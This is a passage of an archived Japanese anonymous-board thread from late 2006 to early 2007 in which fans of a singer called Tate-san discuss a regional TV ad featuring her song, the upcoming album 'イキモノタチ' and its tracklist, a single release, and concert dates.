道のりは1度しか聞いたことないけど、ピアノのみの演奏とあの歌声はタテさんにちがいない。
なぜか愛知県のCMだったけど、めっちゃ興奮した。

190 :名無しの歌姫:2006/12/05(火) 22:57:51 ID:3OuXEYMD
>>189
ぬなっ!見たい!愛知県でしか流れないのか?
道のりはしあわせのうた並みに好きだー

191 :189:2006/12/07(木) 00:29:33 ID:V28cV0jZ
しかし調べても調べてもそれらしき情報が見つからんのだよな。
タテさんのHP行ってもそんなこと書いてないし・・・。
自分の思い過ごしなんだろうか?いや、でもあの声はタテさんだったはず…。

192 :名無しの歌姫:2006/12/07(木) 00:38:22 ID:fQ7NbPIY
愛知県に住んでますが
本当でした はい

193 :名無しの歌姫:2006/12/07(木) 01:09:48 ID:V28cV0jZ
>>192
まじか。ありがとう。何故公式に情報書いてないんだろう?
もう一回見たいなあ、あのCM。びっくりしすぎて曲をよく聞けなかった。
よく考えたらCMで流れるということはもう音源録れてるんだな。
CD発売も間近なのかな。

194 :名無しの歌姫:2006/12/08(金) 01:01:37 ID:V1zRPkb3
掲示板に書き込んだ人グッジョブ

195 :名無しの歌姫:2006/12/08(金) 01:05:06 ID:loprTyLj
まあ書き込んだのは>>189本人なわけですが、あっちで聞いたほうが詳しい情報を得られる気がしたので…。

196 :名無しの歌姫:2006/12/08(金) 20:09:18 ID:loprTyLj
いつの間にか公式に情報来てるな。
愛知県の人権週間のCMだったのか…。
ttp://www.pref.aichi.jp/jinken/18jinkenshukan.html
でラジオのCMは聞けるけど、TVのCMは無理っぽいな。
声が混じって聞き取りづれー!

197 :名無しの歌姫:2006/12/11(月) 00:52:14 ID:zku+ceVE
ああー、名古屋行けるかな?
合宿が終わる日なんだが、微妙かもしれない。
行きたいよ…

198 :名無しの歌姫:2006/12/14(木) 00:22:10 ID:L7txT8yX
過疎しすぎ…
ライブのレポとかいないの?

199 :名無しの歌姫:2006/12/14(木) 00:38:38 ID:mWdnk0ec
日記にも書いてあるけど12日に松本のライブハウスで見かけた。
マスクしてた。

200 :名無しの歌姫:2006/12/14(木) 02:21:10 ID:mWdnk0ec
次のアルバムに収録されるのは
頬杖
道程

ワスレナグサ
+3曲?他ないよね…?
でアルバム出たらエムオンで恒例の特集番組か。ライブの中継とかもやってほしいんだけどなー。

201 :名無しの歌姫:2006/12/14(木) 09:14:44 ID:McflGCsD
>>198
盛り上っても萎える

202 :名無しの歌姫:2006/12/15(金) 20:19:46 ID:VFi4Lylb
タテさんて宮沢りえっぽくない?パッと見

203 :名無しの歌姫:2006/12/16(土) 00:14:36 ID:J8Edowmo
それは無いな

204 :名無しの歌姫:2006/12/16(土) 12:11:14 ID:ZWjqozcK
やっぱ無いか

205 :名無しの歌姫:2006/12/17(日) 19:22:10 ID:wry43K9k
畜生!名古屋行けない!道のり聞きたかった・・・。

NativeSoil買ってからいまはじめてビーグルズを聞いたがこの人たちはなんかメロデーが良いなぁ、とおもった。

206 :名無しの歌姫:2006/12/21(木) 01:00:55 ID:RRf/TVrC
アルゼンチンのHPで特報アップされてたけど主題歌は流れてないのねー

207 :名無しの歌姫:2006/12/24(日) 02:23:06 ID:I75N8maM
ねえ、名古屋行った人レポのはないのかな…
そんなにここって過疎なのかな。

208 :名無しの歌姫:2006/12/24(日) 16:05:12 ID:aNP3aF/N
過疎だな。ここ10レスの半分は俺だ
セットリストだけでもいいかられぽってほしいよな…

209 :名無しの歌姫:2006/12/24(日) 20:05:27 ID:Dz6YLN8Y
特定されるのが怖いうちに書かなくって
セトリも忘れてしもうたがな。

タテさんってイナゴ食べるのかなあ。

210 :名無しの歌姫:2006/12/25(月) 02:03:13 ID:5ZstLz7L
なんでも食べそうなイメージ
イナゴの佃煮はけっこううまいよ

211 :名無しの歌姫:2006/12/25(月) 18:57:26 ID:5ZstLz7L
色変わった

212 :名無しの歌姫:2006/12/25(月) 23:42:41 ID:uY1lR2Mr
遅ればせながら稜線の彼方へ聴いたんだけど
ファーストとかセカンドに比べて
微妙にクオリティー下がってきてね?(´・ω・`)

213 :名無しの歌姫:2006/12/26(火) 01:58:38 ID:78ZXlXgA
>>212
それはちょっと思ってしまった。なんか高音が多すぎて無理してるのかも?と思ったりもした。
NativeSoilのはいままでのと大分歌の感じが違ったしなぁ。
まあ次のアルバムはまた神アルバムになるにちがいない。

214 :名無しの歌姫:2006/12/26(火) 02:01:43 ID:SZCBushy
HMVに新譜情報出てた。
3月20日発売予定。
タイトルは「イキモノタチ」。今回はフルアルバムとのこと。


215 :名無しの歌姫:2006/12/26(火) 02:11:24 ID:SZCBushy
あっワスレナグサでシングルも出るみたい

216 :名無しの歌姫:2006/12/26(火) 03:06:18 ID:78ZXlXgA
>>214-215
おお、情報サンクス!
「イキモノタチ」かぁ。どんなアルバムだろうか。
シングルもだす、ということはシングルは近日になるのかな?

217 :名無しの歌姫:2006/12/26(火) 11:15:42 ID:SZCBushy
シングルは3月7日。カップリングに「道程」
まだまだ先だね…

218 :名無しの歌姫:2006/12/26(火) 14:57:54 ID:i8ydyzyK
カップリングに道程か…。アルバムに入ると思ってた。
もしシングルに入ってる曲全部アルバムにも入ったらシングル買う気出なくなるなぁ…。

219 :名無しの歌姫:2007/01/05(金) 15:51:39 ID:BM7p7nLm
あけおめ!

220 :名無しの歌姫:2007/01/08(月) 01:16:47 ID:uH3kQp+r
泣き虫こよしってどんなきょくじゃろうか

221 :名無しの歌姫:2007/01/08(月) 01:53:50 ID:UEsGXHO2
おっ道のりはアルバムに入らんのね


222 :名無しの歌姫:2007/01/09(火) 00:57:53 ID:k4K+6DT+
つまりはシングルとアルバム、両方買え、ということか。
まあもともと買うつもりだったけど

223 :名無しの歌姫:2007/01/14(日) 20:40:55 ID:pMSfpIi6
イキモノタチ
1.ワスレナグサ
2.手の鳴る方へ
3.残影
4.頬杖
5.押し問答
6.月
7.混濁


「残影」とか「混濁」ってライブでは既出なん?


224 :名無しの歌姫:2007/01/15(月) 00:45:14 ID:FZ6VefGr
>>223
新曲だとおもう。多治見のしか行ったことないからわからんけども。

225 :名無しの歌姫:2007/01/15(月) 01:08:59 ID:tqKraDLQ
スプリットからも入るんだねぇ

226 :名無しの歌姫:2007/01/22(月) 02:50:29 ID:bYiH7l+9
ほしゅ

人いなさすぎ

227 :名無しの歌姫:2007/01/23(火) 20:05:11 ID:PDipfDK4
前に公式の通販でcd買ったら
cdと一緒にライブツアーにでてて
発送が遅れてすいません。みたいな文書キタ。
宛名書きとかタテさんが直接書いてるのかな。
新アルバム楽しみす。


228 :名無しの歌姫:2007/01/23(火) 20:31:45 ID:V0JRA9km
タテさんが一つ一つ書いてるよ
そういえば今日お知らせメールで手紙来たね

229 :名無しの歌姫:2007/01/23(火) 23:08:22 ID:QUcPf8Uc
うう…
愛知はまだ栄えてるほうなのに何故タテさんは来てくれないんだ…

230 :名無しの歌姫:2007/01/24(水) 13:12:39 ID:7gSd17YB
>>228
メールチェックしたら折れんとこにも来てた。
今年はこんな感じでメールするみたいなこと書いてあった。
これまた楽しみな事です。

231 :名無しの歌姫:2007/01/28(日) 16:17:58 ID:7TkgHdbZ
正直、ネイティブみたいな曲は
ちょっと聞きづらいかな・・・おそらくヨエコさんの影響から
あんな感じになったんだろうけど。
フルアルバムはフツーにやってほしい。

232 :名無しの歌姫:2007/01/28(日) 20:05:12 ID:XvHrEivh
そういえばネイティブあんまり聴いてない

233 :名無しの歌姫:2007/02/04(日) 19:33:49 ID:Yg3vK4uq
あとひと月くらいだなー

234 :名無しの歌姫:2007/02/07(水) 06:02:02 ID:Ev5nGD0r
10日の大阪ワンマンライブ行く人いる?
チケット完売みたいだけど。

235 :名無しの歌姫:2007/02/08(木) 00:44:20 ID:9RoenQA3
新あーしゃかわゆす


236 :名無しの歌姫:2007/02/08(木) 22:14:08 ID:sD81dd12
奈良さんがジャケって結構すごい気がするんだけど…。

237 :名無しの歌姫:2007/02/09(金) 00:49:24 ID:klIcr18Y
すごいっちゃすごいね。紙じゃけか
ていうか道のりアルバムに入るのかい!
まーカップリングには勿体ないよなぁ

238 :名無しの歌姫:2007/02/10(土) 03:37:11 ID:5tVMiWHv
アルゼンチンババアちょっと気になってきたな。
しかし近くに上映する劇場が無いんだな。

239 :名無しの歌姫:2007/02/10(土) 21:42:14 ID:cQ5H3qhF
4/6 沖縄 サーラフェリーチェ
4/7 桜坂劇場 ホールB
6/15 品川教会 グローリア・チャペル

沖縄チケは今日がぴあ初日。公式まだ更新されてないけど、楽しみだ。


240 :名無しの歌姫:2007/02/13(火) 18:55:05 ID:xsu7PT0W
松本で4/18にBLEACH、ミドリと対バンするよ

241 :名無しの歌姫:2007/02/14(水) 00:13:18 ID:/73vj0o+
マジ品川教会行きたいわ
つーか、前の品川教会のライブで
タテさんおかしくなかった?
前半、緊張しすぎ??

242 :名無しの歌姫:2007/02/15(木) 08:39:10 ID:E16M3hh8
ナムナム大集会ってあれ何?
宗教関係??

243 :名無しの歌姫:2007/02/15(木) 11:55:48 ID:ZShoDBHB
そういえば去年の品川教会のライブ、
収録してたようだけどDVDとか出ないのかな?

244 :名無しの歌姫:2007/02/15(木) 20:54:12 ID:ZMLv4Ose
えむおんで流れんじゃね?

245 :名無しの歌姫:2007/02/16(金) 18:18:50 ID:ipQOfX2C
今週のゆるなびで「雪と月と君と僕」がかかったね。
ちなみに今夜再放送があるよ。

 ttp://www.nhk.or.jp/yurunavi/

246 :名無しの歌姫:2007/02/16(金) 21:02:28 ID:SsDmJHE6
>>245
オフィシャルサイトにその告知ないよね…。
スルーかよ。

247 :名無しの歌姫:2007/02/16(金) 22:59:58 ID:ipQOfX2C
>>246
まぁ、バックでかかってただけだからね。

248 :名無しの歌姫:2007/02/17(土) 01:26:26 ID:D9r2vY5g
BGMなら長野の番組でもかかってたな
飯田を散策するやつ

249 :名無しの歌姫:2007/02/17(土) 02:20:56 ID:yTlf60gT
さっき NHKのゆるナビって番組の最後に、
この人の曲が流れてたんですが、
テロップが一瞬だったので名前しかわかりませんでした。
歌詞は聞こえなかったのですが、ピアノの弾き語りですごく綺麗でした

曲名ご存じの方がいましたら、お教えくださいm(_ _)m

250 :名無しの歌姫:2007/02/17(土) 02:22:07 ID:yTlf60gT
うわ〜すいません!
リロードしてなかったです!
飛んできます


251 :名無しの歌姫:2007/02/20(火) 09:26:09 ID:O8h3ozY9
ワンマンライブマダー??

252 :名無しの歌姫:2007/02/23(金) 07:52:06 ID:WuNg2OX1
過疎ってるなぁ

253 :名無しの歌姫:2007/02/23(金) 13:34:58 ID:m5LemNJj
ツアー日程出てるね。
やっとワンマン見れそう@まつもと

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)